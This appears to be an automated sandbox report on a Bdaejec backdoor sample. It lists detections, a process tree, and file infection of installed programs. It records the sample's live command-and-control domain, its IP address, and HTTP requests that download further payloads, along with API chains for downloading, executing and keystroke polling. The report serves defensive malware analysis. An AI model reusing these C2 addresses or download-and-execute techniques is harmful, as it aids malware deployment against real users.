Edit tour

Windows Analysis Report
BXOZIGZEUa.exe

Overview

General Information

Sample name:	BXOZIGZEUa.exe renamed because original name is a hash value
Original sample name:	8f5469d96f148afd08a0f693684f9bb0195a5291eb2437214c01465b463acbf8.exe
Analysis ID:	1585133
MD5:	fa07873f37b171a5567a9b4b3f2c65eb
SHA1:	47d5210522d8c54d3076c1467f2f495025037bb6
SHA256:	8f5469d96f148afd08a0f693684f9bb0195a5291eb2437214c01465b463acbf8
Tags:	exeuser-zhuzhu0009
Infos:

Detection

Bdaejec

Score:	66
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Detected unpacking (changes PE section rights)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Bdaejec

AI detected suspicious sample

Infects executable files (exe, dll, sys, html)

Machine Learning detection for dropped file

Machine Learning detection for sample

PE file contains section with special chars

PE file has a writeable .text section

Uses known network protocols on non-standard ports

AV process strings found (often used to terminate AV products)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to dynamically determine API calls

Contains functionality to query locales information (e.g. system language)

Contains functionality to read device registry values (via SetupAPI)

Contains functionality to read the PEB

Contains functionality to retrieve information about pressed keystrokes

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates files inside the system directory

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Entry point lies outside standard sections

Extensive use of GetProcAddress (often used to hide API calls)

Found dropped PE file which has not been started or loaded

Found evasive API chain (date check)

Found evasive API chain (may stop execution after checking a module file name)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Installs a raw input device (often for capturing keystrokes)

One or more processes crash

PE file contains executable resources (Code or Archives)

PE file contains sections with non-standard names

Potential key logger detected (key state polling based)

Queries device information via Setup API

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses the system / local time for branch decision (may execute only at specific dates)

Classification

Process Tree

System is w10x64

BXOZIGZEUa.exe (PID: 5612 cmdline: "C:\Users\user\Desktop\BXOZIGZEUa.exe" MD5: FA07873F37B171A5567A9B4B3F2C65EB)

conhost.exe (PID: 4320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

JdEV.exe (PID: 3524 cmdline: C:\Users\user\AppData\Local\Temp\JdEV.exe MD5: 56B2C3810DBA2E939A8BB9FA36D3CF96)

WerFault.exe (PID: 3608 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3524 -s 1592 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
Process Memory Space: JdEV.exe PID: 3524	JoeSecurity_Bdaejec	Yara detected Bdaejec	Joe Security

Suricata Signatures

ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-07T06:07:58.585996+0100	2807908	1	Malware Command and Control Activity Detected	192.168.2.5	49704	44.221.84.105	799	TCP
2025-01-07T06:08:02.958493+0100	2807908	1	Malware Command and Control Activity Detected	192.168.2.5	49705	44.221.84.105	799	TCP

ETPRO MALWARE Backdoor.Win32/Bdaejec.A CnC Domain in DNS Lookup

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-07T06:07:57.948894+0100	2838522	1	Malware Command and Control Activity Detected	192.168.2.5	56399	1.1.1.1	53	UDP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: BXOZIGZEUa.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://ddos.dnsnb8.net:799/cj//k1.raru	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k2.rarS	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k2.rarGp	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k2.rar	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Program Files\7-Zip\Uninstall.exe	Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\Users\user\AppData\Local\Temp\JdEV.exe	Avira: detection malicious, Label: TR/Dldr.Small.Z.haljq

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\JdEV.exe

ReversingLabs: Detection: 97%

Multi AV Scanner detection for submitted file

Source: BXOZIGZEUa.exe	Virustotal: Detection: 87%			Perma Link
Source: BXOZIGZEUa.exe	ReversingLabs: Detection: 94%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.6% probability

Machine Learning detection for dropped file

Source: C:\Program Files\7-Zip\Uninstall.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\JdEV.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: BXOZIGZEUa.exe

Joe Sandbox ML: detected

Source: BXOZIGZEUa.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\BXOZIGZEUa.exe

File created: C:\Users\user\Desktop\uninstall.log

Jump to behavior

Source: BXOZIGZEUa.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: D:\Workspace\Driver\DriverUninstall\Release\DriverUninstall.pdb source: BXOZIGZEUa.exe
Source:	Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.2.dr

Spreading

Infects executable files (exe, dll, sys, html)

Source: C:\Users\user\AppData\Local\Temp\JdEV.exe	System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JdEV.exe	System file written: C:\Program Files\7-Zip\Uninstall.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JdEV.exe	System file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Jump to behavior

Source: C:\Users\user\Desktop\BXOZIGZEUa.exe	Code function: 0_2_004DB7F2 lstrlenW,SetLastError,FindFirstFileW,GetLastError,__wfullpath,__wsplitpath_s,__wmakepath_s,	0_2_004DB7F2
Source: C:\Users\user\Desktop\BXOZIGZEUa.exe	Code function: 0_2_004DB3FE GetModuleHandleW,GetProcAddress,FindFirstFileW,	0_2_004DB3FE
Source: C:\Users\user\Desktop\BXOZIGZEUa.exe	Code function: 0_2_004ED5ED __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,lstrlenW,	0_2_004ED5ED
Source: C:\Users\user\AppData\Local\Temp\JdEV.exe	Code function: 2_2_00D129E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,	2_2_00D129E2

Source: C:\Users\user\AppData\Local\Temp\JdEV.exe

Code function: 2_2_00D12B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread,

2_2_00D12B8C

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2838522 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Bdaejec.A CnC Domain in DNS Lookup : 192.168.2.5:56399 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2807908 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin : 192.168.2.5:49705 -> 44.221.84.105:799
Source: Network traffic	Suricata IDS: 2807908 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin : 192.168.2.5:49704 -> 44.221.84.105:799

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 799
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 799

Source: global traffic

TCP traffic: 192.168.2.5:49704 -> 44.221.84.105:799

Source: Joe Sandbox View

IP Address: 44.221.84.105 44.221.84.105

Source: global traffic	HTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cj//k2.rar HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\AppData\Local\Temp\JdEV.exe

Code function: 2_2_00D11099 wsprintfA,WinExec,lstrlen,wsprintfA,wsprintfA,URLDownloadToFileA,lstrlen,Sleep,

2_2_00D11099

Source: global traffic	HTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cj//k2.rar HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive

Source: global traffic

DNS traffic detected: DNS query: ddos.dnsnb8.net

Source: JdEV.exe, 00000002.00000002.2597280384.0000000000D13000.00000002.00000001.01000000.00000004.sdmp, JdEV.exe, 00000002.00000003.2071431419.00000000011E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE
Source: JdEV.exe, 00000002.00000003.2080979564.0000000000D9B000.00000004.00000020.00020000.00000000.sdmp, JdEV.exe, 00000002.00000002.2597372810.0000000000D3E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar
Source: JdEV.exe, 00000002.00000003.2080979564.0000000000D9B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.raru
Source: JdEV.exe, 00000002.00000002.2597372810.0000000000D9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rar
Source: JdEV.exe, 00000002.00000002.2598094406.0000000002B7A000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarGp
Source: JdEV.exe, 00000002.00000002.2597372810.0000000000D9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarS
Source: Amcache.hve.2.dr	String found in binary or memory: http://upx.sf.net
Source: SciTE.exe.2.dr	String found in binary or memory: http://www.activestate.com
Source: SciTE.exe.2.dr	String found in binary or memory: http://www.activestate.comHolger
Source: SciTE.exe.2.dr	String found in binary or memory: http://www.baanboard.com
Source: SciTE.exe.2.dr	String found in binary or memory: http://www.baanboard.comBrendon
Source: SciTE.exe.2.dr	String found in binary or memory: http://www.develop.com
Source: SciTE.exe.2.dr	String found in binary or memory: http://www.develop.comDeepak
Source: SciTE.exe.2.dr	String found in binary or memory: http://www.lua.org
Source: SciTE.exe.2.dr	String found in binary or memory: http://www.rftp.com
Source: SciTE.exe.2.dr	String found in binary or memory: http://www.rftp.comJosiah
Source: SciTE.exe.2.dr	String found in binary or memory: http://www.scintilla.org
Source: SciTE.exe.2.dr	String found in binary or memory: http://www.scintilla.org/scite.rng
Source: SciTE.exe.2.dr	String found in binary or memory: http://www.spaceblue.com
Source: SciTE.exe.2.dr	String found in binary or memory: http://www.spaceblue.comMathias
Source: JdEV.exe, 00000002.00000002.2597372810.0000000000D9E000.00000004.00000020.00020000.00000000.sdmp, JdEV.exe, 00000002.00000003.2080979564.0000000000D9B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.comJ
Source: SciTE.exe.2.dr	String found in binary or memory: https://www.smartsharesystems.com/
Source: SciTE.exe.2.dr	String found in binary or memory: https://www.smartsharesystems.com/Morten

Source: C:\Users\user\Desktop\BXOZIGZEUa.exe

Code function: 0_2_00520549 GetClientRect,GetAsyncKeyState,SendMessageW,SetScrollPos,

0_2_00520549

Source: SciTE.exe.2.dr

Binary or memory string: _winapi_getrawinputdata _winapi_getrawinputdeviceinfo _winapi_getregiondata _winapi_getregisteredrawinputdevices \

memstr_a1dea10d-2

Source: C:\Users\user\Desktop\BXOZIGZEUa.exe	Code function: 0_2_005220D5 GetKeyState,GetKeyState,GetKeyState,GetKeyState,	0_2_005220D5
Source: C:\Users\user\Desktop\BXOZIGZEUa.exe	Code function: 0_2_0055C7D7 __EH_prolog3_GS,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetParent,SendMessageW,_memset,ScreenToClient,_memset,GetCursorPos,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetWindowPos,SendMessageW,_memset,_free,SendMessageW,GetParent,	0_2_0055C7D7
Source: C:\Users\user\Desktop\BXOZIGZEUa.exe	Code function: 0_2_0051A90D ScreenToClient,_memset,_free,GetKeyState,GetKeyState,GetKeyState,KillTimer,IsWindow,	0_2_0051A90D
Source: C:\Users\user\Desktop\BXOZIGZEUa.exe	Code function: 0_2_004F4F49 IsWindow,SendMessageW,GetCapture,GetKeyState,GetKeyState,GetKeyState,ImmGetContext,ImmGetOpenStatus,ImmReleaseContext,GetFocus,IsWindow,IsWindow,IsWindow,ClientToScreen,IsWindow,ClientToScreen,	0_2_004F4F49
Source: C:\Users\user\Desktop\BXOZIGZEUa.exe	Code function: 0_2_004F3094 IsWindow,SendMessageW,GetCapture,GetKeyState,GetKeyState,GetKeyState,ImmGetContext,ImmGetOpenStatus,ImmReleaseContext,GetFocus,IsWindow,IsWindow,IsWindow,ClientToScreen,IsWindow,ClientToScreen,	0_2_004F3094
Source: C:\Users\user\Desktop\BXOZIGZEUa.exe	Code function: 0_2_0055F4A8 GetKeyState,GetKeyState,GetKeyState,	0_2_0055F4A8
Source: C:\Users\user\Desktop\BXOZIGZEUa.exe	Code function: 0_2_0051794D SendMessageW,UpdateWindow,GetKeyState,GetKeyState,GetKeyState,GetParent,PostMessageW,	0_2_0051794D
Source: C:\Users\user\Desktop\BXOZIGZEUa.exe	Code function: 0_2_0055BC41 GetKeyState,GetKeyState,GetKeyState,GetTickCount,SetCapture,PeekMessageW,GetCapture,PeekMessageW,PeekMessageW,PtInRect,GetTickCount,ReleaseCapture,	0_2_0055BC41
Source: C:\Users\user\Desktop\BXOZIGZEUa.exe	Code function: 0_2_0052FE15 GetWindowRect,GetKeyState,GetKeyState,GetKeyState,KillTimer,GetFocus,SetTimer,	0_2_0052FE15

System Summary

PE file contains section with special chars

Source: MyProg.exe.2.dr

Static PE information: section name: Y|uR

PE file has a writeable .text section

Source: JdEV.exe.0.dr

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: C:\Users\user\Desktop\BXOZIGZEUa.exe	File created: C:\Windows\inf\oem0.PNF	Jump to behavior
Source: C:\Users\user\Desktop\BXOZIGZEUa.exe	File created: C:\Windows\inf\oem1.PNF	Jump to behavior
Source: C:\Users\user\Desktop\BXOZIGZEUa.exe	File created: C:\Windows\inf\oem3.PNF	Jump to behavior

Source: C:\Users\user\Desktop\BXOZIGZEUa.exe	Code function: 0_2_005D0170	0_2_005D0170
Source: C:\Users\user\Desktop\BXOZIGZEUa.exe	Code function: 0_2_00542118	0_2_00542118
Source: C:\Users\user\Desktop\BXOZIGZEUa.exe	Code function: 0_2_005CE120	0_2_005CE120
Source: C:\Users\user\Desktop\BXOZIGZEUa.exe	Code function: 0_2_0056083D	0_2_0056083D
Source: C:\Users\user\Desktop\BXOZIGZEUa.exe	Code function: 0_2_0051CF37	0_2_0051CF37
Source: C:\Users\user\Desktop\BXOZIGZEUa.exe	Code function: 0_2_0054107C	0_2_0054107C
Source: C:\Users\user\Desktop\BXOZIGZEUa.exe	Code function: 0_2_005370B1	0_2_005370B1
Source: C:\Users\user\Desktop\BXOZIGZEUa.exe	Code function: 0_2_005DF14C	0_2_005DF14C
Source: C:\Users\user\Desktop\BXOZIGZEUa.exe	Code function: 0_2_005CF9C8	0_2_005CF9C8
Source: C:\Users\user\AppData\Local\Temp\JdEV.exe	Code function: 2_2_00D16076	2_2_00D16076
Source: C:\Users\user\AppData\Local\Temp\JdEV.exe	Code function: 2_2_00D16D00	2_2_00D16D00

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\JdEV.exe 4354970CCC7CD6BB16318F132C34F6A1B3D5C2EA7FF53E1C9271905527F2DB07

Source: C:\Users\user\Desktop\BXOZIGZEUa.exe	Code function: String function: 005CEABF appears 61 times
Source: C:\Users\user\Desktop\BXOZIGZEUa.exe	Code function: String function: 005CF180 appears 49 times
Source: C:\Users\user\Desktop\BXOZIGZEUa.exe	Code function: String function: 005CEA56 appears 223 times

Source: C:\Users\user\AppData\Local\Temp\JdEV.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3524 -s 1592

Source: MyProg.exe.2.dr

Static PE information: Resource name: RT_VERSION type: MIPSEB-LE ECOFF executable not stripped - version 0.79

Source: BXOZIGZEUa.exe, 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameDriverUninstall.exe@ vs BXOZIGZEUa.exe
Source: BXOZIGZEUa.exe	Binary or memory string: OriginalFilenameDriverUninstall.exe@ vs BXOZIGZEUa.exe

Source: BXOZIGZEUa.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: JdEV.exe.0.dr

Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: JdEV.exe.0.dr

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: JdEV.exe.0.dr

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0

Source: classification engine

Classification label: mal66.spre.troj.evad.winEXE@7/16@1/1

Source: C:\Users\user\AppData\Local\Temp\JdEV.exe

Code function: 2_2_00D1119F GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,CloseHandle,

2_2_00D1119F

Source: C:\Users\user\Desktop\BXOZIGZEUa.exe

Code function: 0_2_004DD36B CoInitialize,CoCreateInstance,

0_2_004DD36B

Source: C:\Users\user\Desktop\BXOZIGZEUa.exe

Code function: 0_2_005C86A5 GetUserDefaultUILanguage,FindResourceExW,FindResourceW,LoadResource,GlobalAlloc,

0_2_005C86A5

Source: C:\Users\user\Desktop\BXOZIGZEUa.exe

File created: C:\Users\user\Desktop\uninstall.log

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4320:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3524

Source: C:\Users\user\Desktop\BXOZIGZEUa.exe

File created: C:\Users\user\AppData\Local\Temp\JdEV.exe

Jump to behavior

Source: C:\Users\user\Desktop\BXOZIGZEUa.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: BXOZIGZEUa.exe	Virustotal: Detection: 87%
Source: BXOZIGZEUa.exe	ReversingLabs: Detection: 94%

Source: unknown	Process created: C:\Users\user\Desktop\BXOZIGZEUa.exe "C:\Users\user\Desktop\BXOZIGZEUa.exe"
Source: C:\Users\user\Desktop\BXOZIGZEUa.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\BXOZIGZEUa.exe	Process created: C:\Users\user\AppData\Local\Temp\JdEV.exe C:\Users\user\AppData\Local\Temp\JdEV.exe
Source: C:\Users\user\AppData\Local\Temp\JdEV.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3524 -s 1592
Source: C:\Users\user\Desktop\BXOZIGZEUa.exe	Process created: C:\Users\user\AppData\Local\Temp\JdEV.exe C:\Users\user\AppData\Local\Temp\JdEV.exe	Jump to behavior

Source: C:\Users\user\Desktop\BXOZIGZEUa.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\BXOZIGZEUa.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\BXOZIGZEUa.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\BXOZIGZEUa.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\BXOZIGZEUa.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\BXOZIGZEUa.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\BXOZIGZEUa.exe	Section loaded: devrtl.dll	Jump to behavior
Source: C:\Users\user\Desktop\BXOZIGZEUa.exe	Section loaded: spinf.dll	Jump to behavior
Source: C:\Users\user\Desktop\BXOZIGZEUa.exe	Section loaded: drvstore.dll	Jump to behavior
Source: C:\Users\user\Desktop\BXOZIGZEUa.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Users\user\Desktop\BXOZIGZEUa.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JdEV.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JdEV.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JdEV.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JdEV.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JdEV.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JdEV.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JdEV.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JdEV.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JdEV.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JdEV.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JdEV.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JdEV.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JdEV.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JdEV.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JdEV.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JdEV.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JdEV.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JdEV.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JdEV.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JdEV.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JdEV.exe	Section loaded: ntvdm64.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JdEV.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JdEV.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JdEV.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JdEV.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JdEV.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JdEV.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JdEV.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JdEV.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JdEV.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JdEV.exe	Section loaded: ntvdm64.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JdEV.exe	Section loaded: version.dll	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\JdEV.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\JdEV.exe	Automated click: OK
Source: C:\Users\user\AppData\Local\Temp\JdEV.exe	Automated click: OK

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: BXOZIGZEUa.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: BXOZIGZEUa.exe

Static file information: File size 1700352 > 1048576

Source: BXOZIGZEUa.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x126a00

Source: BXOZIGZEUa.exe

Static PE information: More than 200 imports for USER32.dll

Source: BXOZIGZEUa.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: BXOZIGZEUa.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: BXOZIGZEUa.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: BXOZIGZEUa.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: BXOZIGZEUa.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: BXOZIGZEUa.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: BXOZIGZEUa.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: BXOZIGZEUa.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: D:\Workspace\Driver\DriverUninstall\Release\DriverUninstall.pdb source: BXOZIGZEUa.exe
Source:	Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.2.dr

Source: BXOZIGZEUa.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: BXOZIGZEUa.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: BXOZIGZEUa.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: BXOZIGZEUa.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: BXOZIGZEUa.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\AppData\Local\Temp\JdEV.exe

Unpacked PE file: 2.2.JdEV.exe.d10000.0.unpack .text:EW;.rdata:W;.data:W;.reloc:W;.aspack:EW;.adata:EW; vs .text:ER;.rdata:R;.data:W;.reloc:R;.aspack:EW;.adata:EW;

Source: C:\Users\user\Desktop\BXOZIGZEUa.exe

